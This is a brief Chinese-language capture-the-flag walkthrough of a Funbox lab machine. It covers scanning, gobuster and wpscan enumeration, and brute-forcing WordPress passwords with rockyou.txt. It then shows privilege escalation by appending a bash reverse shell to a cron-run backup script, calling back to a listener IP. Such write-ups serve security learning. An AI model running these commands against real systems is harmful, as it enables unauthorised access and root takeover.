扫描存活主机IP
IP端口扫描
访问80端口
发现进不去 需要修改一下hosts
```
vim /etc/hosts
```
扫描目录
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,zip,bak,txt,php -u http://10.4.7.148
访问 http://funbox.fritz.box/robots.txt
发现一个目录
使用wpscan扫描网站获取账号密码
wpscan --url http://funbox.fritz.box/ -e
使用wpscan枚举密码
wpscan --url http://funbox.fritz.box/ -U admin,joe --passwords /usr/share/wordlists/rockyou.txt
连接ssh
提权
进入funny 文件夹 发现 .backup.sh .reminder.sh
查看两个文件 发现是一个 .backup.sh 是一个定时执行文件
那就写入shell反弹 然后kali监听
echo "bash -i >/dev/tcp/10.4.7.182/8888 0>&1" >> .backup.sh
在经过四次监听之后 终于是拿到了root权限 并找到flag